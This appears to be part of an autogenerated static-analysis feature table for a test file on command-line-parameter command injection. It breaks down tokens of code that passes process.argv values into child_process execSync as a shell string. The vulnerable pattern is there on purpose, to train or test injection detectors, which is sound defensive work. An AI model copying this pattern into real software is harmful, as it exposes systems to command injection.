contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:28:24:32 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:28:24:32 | slice | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:28:24:32 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:28:24:32 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | CalleeFlexibleAccessPath | process.argv.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:34:24:34 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:13 | script | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:13 | script | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:13 | script | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:13 | script | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:13 | script | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script ... ex.js') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script ... ex.js') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script ... ex.js') | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script ... ex.js') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:8:25:56 | script ... ex.js') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:20 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:20 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:20 | path | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:20 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:20 | path | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:25 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:25 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:25 | path.join | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:25 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:25 | path.join | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | exceptional return of path.jo ... ex.js') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | exceptional return of path.jo ... ex.js') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | exceptional return of path.jo ... ex.js') | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | exceptional return of path.jo ... ex.js') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | exceptional return of path.jo ... ex.js') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:22:25:25 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:22:25:25 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:22:25:25 | join | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:22:25:25 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:22:25:25 | join | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:27:25:36 | packageDir | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:39:25:43 | 'app' | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:46:25:55 | 'index.js' | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:3 | cp | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:12 | cp.execSync | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | exceptional return of cp.exec ... tion"`) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | exceptional return of cp.exec ... tion"`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | exceptional return of cp.exec ... tion"`) | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | exceptional return of cp.exec ... tion"`) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | exceptional return of cp.exec ... tion"`) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:5:26:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:5:26:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:5:26:12 | execSync | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:5:26:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:5:26:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:14:26:50 | `node $ ... ption"` | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:15:26:19 | node | stringConcatenatedWith | -endpoint- script + ' ' + args.0 + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:22:26:27 | script | stringConcatenatedWith | 'node ' -endpoint- ' ' + args.0 + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:29:26:29 | | stringConcatenatedWith | 'node ' + script -endpoint- args.0 + ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:35 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:35 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:35 | args | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:35 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:35 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:32:26:38 | args[0] | stringConcatenatedWith | 'node ' + script + ' ' -endpoint- ' --option"' | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:37:26:37 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:37:26:37 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:37:26:37 | 0 | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:37:26:37 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:37:26:37 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:40:26:49 | --option" | stringConcatenatedWith | 'node ' + script + ' ' + args.0 -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:3 | cp | enclosingFunctionBody | args process argv slice 2 script path join packageDir app index.js cp execSync node script args 0 0 --option" cp execSync node script args join --option" | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| 